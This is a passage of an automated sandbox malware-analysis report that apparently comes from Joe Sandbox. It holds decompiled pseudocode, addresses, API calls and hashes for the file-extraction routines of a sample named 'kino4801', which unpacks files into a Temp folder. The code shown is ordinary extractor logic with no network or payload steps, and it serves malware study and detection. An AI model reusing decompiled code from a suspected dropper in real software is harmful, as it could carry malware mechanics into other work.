						return E010D6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x10d8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x10d91e4;
						_t58 = 0x10d91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x10d91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x10d91e4;
						_t30 = E010D4702( &_v268, 0x10d91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E010D476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E010D4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E010D47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x10d93f4 =  *0x10d93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x10d91e4;
						_t63 = 0x10d91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x10d91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x10d91e4;
						_t30 = E010D4702( &_v268, 0x10d91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E010D4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E010D4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E010D4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x010d4cd0
0x010d4cdb
0x010d4ce0
0x010d4ce2
0x010d4cee
0x010d4cf2
0x010d4d0e
0x010d4d0e
0x010d4d11
0x010d4e83
0x010d4e88
0x010d4e98
0x010d4e98
0x010d4d17
0x010d4d17
0x010d4d1a
0x010d4d2f
0x010d4d2f
0x00000000
0x010d4d2f
0x010d4d1c
0x010d4d1c
0x010d4d1f
0x010d4dcb
0x010d4dd0
0x010d4dd2
0x010d4ddd
0x010d4ddd
0x010d4de3
0x010d4de8
0x010d4ded
0x010d4ded
0x010d4def
0x010d4df0
0x010d4df0
0x010d4df4
0x010d4df4
0x010d4df6
0x010d4df9
0x010d4dfc
0x010d4dfc
0x010d4dfe
0x010d4dff
0x010d4dff
0x010d4e03
0x010d4e08
0x010d4e0a
0x010d4e0f
0x010d4d03
0x010d4d03
0x00000000
0x010d4d03
0x010d4e18
0x010d4e20
0x010d4e25
0x010d4e27
0x00000000
0x00000000
0x010d4e33
0x010d4e38
0x010d4e3a
0x00000000
0x00000000
0x010d4e40
0x010d4e51
0x010d4e56
0x010d4e5b
0x010d4e5e
0x00000000
0x00000000
0x010d4e6a
0x010d4e6f
0x010d4e71
0x00000000
0x00000000
0x010d4e77
0x010d4e7d
0x00000000
0x010d4e7d
0x010d4d25
0x010d4d25
0x010d4d28
0x010d4d36
0x010d4d3b
0x010d4d40
0x010d4d40
0x010d4d42
0x010d4d43
0x010d4d43
0x010d4d47
0x010d4d4a
0x010d4d4a
0x010d4d4c
0x010d4d4f
0x010d4d4f
0x010d4d51
0x010d4d52
0x010d4d52
0x010d4d56
0x010d4d5b
0x010d4d5d
0x010d4d62
0x00000000
0x00000000
0x010d4d67
0x010d4d6f
0x010d4d74
0x010d4d76
0x00000000
0x00000000
0x010d4d7c
0x010d4d84
0x010d4d89
0x010d4d8b
0x00000000
0x00000000
0x010d4d94
0x010d4d99
0x010d4d9e
0x010d4da1
0x010d4daa
0x010d4daa
0x010d4da3
0x010d4da3
0x010d4da3
0x010d4db5
0x010d4dbb
0x010d4dbd
0x00000000
0x010d4dc3
0x010d4dc5
0x00000000
0x010d4dc5
0x010d4dbd
0x010d4d2a
0x010d4d2a
0x010d4d2d
0x00000000
0x00000000
0x00000000
0x010d4d2d
0x010d4cf8
0x010d4cfd
0x010d4d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 010D4DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 010D4DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D4D36, 010D4DE3

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 3625706803-256195474
Opcode ID: 3118342770bf3761b0fcf709a323f699fe69037d83ba523418c1652d30b96cf3
Instruction ID: c6ae06fcb67904e9d04faab1796e38211f83fd55ed02e3665786b2017fcf57b9
Opcode Fuzzy Hash: 3118342770bf3761b0fcf709a323f699fe69037d83ba523418c1652d30b96cf3
Instruction Fuzzy Hash: 3F4123362043029BDB71AF3CD9446F97BE5EF46300F0486A8D8C6D7E85DA32DA4ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 010D4C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D4C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x10d8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x10d8d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x010d4c40
0x010d4c4a
0x010d4c8d
0x00000000
0x010d4c70
0x010d4c70
0x010d4c7e
0x010d4c86
0x00000000
0x00000000
0x00000000
0x010d4c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 010D4C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010D4C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 010D4C7E

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 5459a84ccaa6d8c60f999920d5e9f7df22f53c5f46483023da58160094eb8f21
Instruction ID: 50e989a5598fe0597fecb74f71280de1c131e51ff2b1aadb885ddb7a73b3cf3e
Opcode Fuzzy Hash: 5459a84ccaa6d8c60f999920d5e9f7df22f53c5f46483023da58160094eb8f21
Instruction Fuzzy Hash: F5F0907260020DBFABA4EFB8CC49DFB7BEDEB04240744466BE996C2450FA35D514C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 010D487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E010D487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E010D490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x010d4880
0x010d488c
0x010d4894
0x010d48a0
0x010d48c9
0x010d48ce
0x010d48a2
0x010d48a8
0x010d48b7
0x010d48bc
0x010d48aa
0x010d48ac
0x010d48ac
0x010d48a8
0x010d48de
0x010d48e7
0x010d490b
0x010d48ee
0x010d48f0
0x00000000
0x010d4902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,010D4A23,?,010D4F67,*MEMCAB,00008000,00000180), ref: 010D48DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,010D4F67,*MEMCAB,00008000,00000180), ref: 010D4902

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c91300969b5619d2e7d325eaed0b17d3f8636a449393a1ec89512997725662c5
Instruction ID: d609f100cc4eca8ee585f41fe80697a6b182fcf272c3a6ae0f5bd5555c55229a
Opcode Fuzzy Hash: c91300969b5619d2e7d325eaed0b17d3f8636a449393a1ec89512997725662c5
Instruction Fuzzy Hash: 27016DA3E126702AF36440398C89FFB955CCBD6675F1B0335BEEAE75C1D6644C0482E0

Uniqueness

Uniqueness Score: -1.00%

Function 010D4AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E010D4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x10d858c; // 0x274
				_t9 = E010D3680(_t20);
				if( *0x10d91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x10d8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x10d9400; // 0x56000
							_t15 = _t14 + _t25;
							 *0x10d9400 = _t15;
							if( *0x10d8184 != 0) {
								_t21 =  *0x10d8584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10d93f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x010d4ad5
0x010d4adb
0x010d4ae7
0x010d4aee
0x010d4b05
0x010d4b0d
0x010d4b14
0x010d4b1a
0x010d4b1c
0x010d4b21
0x010d4b2a
0x010d4b2f
0x010d4b31
0x010d4b39
0x010d4b54
0x010d4b54
0x010d4b39
0x010d4b2f
0x010d4b0f
0x010d4b0f
0x010d4b0f
0x010d4b5e
0x010d4ae9
0x010d4aed
0x010d4aed

APIs

Part of subcall function 010D3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010D369F
Part of subcall function 010D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36B2
Part of subcall function 010D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 010D4B05

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 39df64131044268ffb71eb47369f3c4a8346e2d95286afa02b4a7e7a4057be7b
Instruction ID: c10e273a56c018d5a0e9bd05131aa6c34733e60e56259bc35ba949c5c2988281
Opcode Fuzzy Hash: 39df64131044268ffb71eb47369f3c4a8346e2d95286afa02b4a7e7a4057be7b
Instruction Fuzzy Hash: 21018031201301ABD7248F68DC05FA67BA9FB58735F048266FEB9D75D4CB769811CB40

Uniqueness

Uniqueness Score: -1.00%

Function 010D658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x10d8b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x10d8b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E010D16B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x010d6592
0x010d6594
0x010d6596
0x010d6598
0x010d6598
0x010d659b
0x010d659b
0x010d659d
0x010d659e
0x010d65a2
0x010d65a4
0x010d65a9
0x010d65b2
0x010d65b6
0x010d65ba
0x010d65c3
0x010d65c5
0x010d65c8
0x010d65c8
0x010d65c3
0x010d65c9
0x010d65cc
0x010d65d2
0x010d65d1
0x010d65d1
0x00000000
0x010d65dc
0x00000000

APIs

CharPrevA.USER32(010D8B3E,010D8B3F,00000001,010D8B3E,-00000003,?,010D60EC,010D1140,?), ref: 010D65BA

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: e9c0fb66e33a3818e0b788dc009ab9c825aa53a774e9da4094595a2060724cc9
Instruction ID: 05c6c2e5bd0fdf0831feaf7b3962c1efe9d3de5243aee7a7b13ad65ec416e423
Opcode Fuzzy Hash: e9c0fb66e33a3818e0b788dc009ab9c825aa53a774e9da4094595a2060724cc9
Instruction Fuzzy Hash: BEF042321043509BD331451D9884BA6BFDD9B96150F59019EF9DAC320DCA674D8587A0

Uniqueness

Uniqueness Score: -1.00%

Function 010D621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E010D621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x10d8004; // 0x261cebeb
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E010D597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E010D44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x10d9124 = E010D6285();
					_t9 = 0;
				}
				return E010D6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x010d6229
0x010d6230
0x010d6247
0x010d626a
0x010d6272
0x010d6249
0x010d6255
0x010d625f
0x010d6264
0x010d6264
0x010d6284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 010D623F

Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010D4554

Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: e96bab625b8581ea87d0365f95d76b6ca26b9254117f05b993042e73eed3e00a
Instruction ID: 94fae7b5e772a6104eb3040b26f2d6a2a54140a636ba37b5be9eca52e7acc0b8
Opcode Fuzzy Hash: e96bab625b8581ea87d0365f95d76b6ca26b9254117f05b993042e73eed3e00a
Instruction Fuzzy Hash: 52F05EB0704309ABE7A0EB74DD06FFE77A8DB54700F40446AA9C6D7181ED7A99848754

Uniqueness

Uniqueness Score: -1.00%

Function 010D4B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x10d8d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x10d8d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x10d8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x10d8d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x10d8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x10d8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x10d8d6c)) = 0;
				return 0;
			}

0x010d4b66
0x010d4b74
0x010d4b98
0x010d4ba0
0x00000000
0x010d4bac
0x010d4ba4
0x00000000
0x010d4ba4
0x010d4b78
0x010d4b7e
0x010d4b84
0x010d4b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,010D4FA1,00000000), ref: 010D4B98

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: cd3d7e76d0ade06e8d3a550454395e3dad67e9ac289d66bba582a53519790310
Instruction ID: b0fe64ab250fa23c39f6da9dff6b6d31aba52bda05a48e9edf4b2ef231a3a3ae
Opcode Fuzzy Hash: cd3d7e76d0ade06e8d3a550454395e3dad67e9ac289d66bba582a53519790310
Instruction Fuzzy Hash: 3BF01231500B0DAE4771AE2ACC0269ABFE6EBA5270310892FD5EED21E0E7706441CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010D66AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x010d66b1
0x010d66ba
0x010d66c7
0x010d66bc
0x010d66be
0x010d66be

APIs

GetFileAttributesA.KERNELBASE(?,010D4777,?,010D4E38,?), ref: 010D66B1

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: aa4709a03f615259f08adce981b9396b2dd94d46959f4c277090e7fa15368d44
Instruction ID: fab4fcb6f9cfebaaf7e17f2a236394ac8244f2f1f638011668b12a9a98944191
Opcode Fuzzy Hash: aa4709a03f615259f08adce981b9396b2dd94d46959f4c277090e7fa15368d44
Instruction Fuzzy Hash: 5BB09276222540826A61063968295562881A6C123A7E45B90F072C11D4CA3FD446D104

Uniqueness

Uniqueness Score: -1.00%

Function 010D4CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x010d4caa
0x010d4cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 010D4CAA

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 556f359041c4e409505310e875d9671b0c2e99390f8ed9999bfdcb1ad186310e
Instruction ID: 4697e91657c81aca3bf524f38987453eb2c7b178e18ce4404c03a84c3242081b
Opcode Fuzzy Hash: 556f359041c4e409505310e875d9671b0c2e99390f8ed9999bfdcb1ad186310e
Instruction Fuzzy Hash: B1B0123214420CF7CF102ED2E809F853F1DEBC4761F144000FA0C46040CA7794108795

Uniqueness

Uniqueness Score: -1.00%

Function 010D4CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x010d4cc8
0x010d4ccf

APIs

GlobalFree.KERNELBASE ref: 010D4CC8

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 449256702cc765ebfd780baa81ba342a7179df683086c909eee808a97aac1d84
Instruction ID: 3d4be067431c3b0bc94925d09708c8db4e76196c33f8ff34e5f860a1fc8f6827
Opcode Fuzzy Hash: 449256702cc765ebfd780baa81ba342a7179df683086c909eee808a97aac1d84
Instruction Fuzzy Hash: 84B0123100010CF78F102A52E8088453F1DD6C43607000010F90C42011CB3B98118684

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 010D5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E010D5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x10d8004; // 0x261cebeb
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
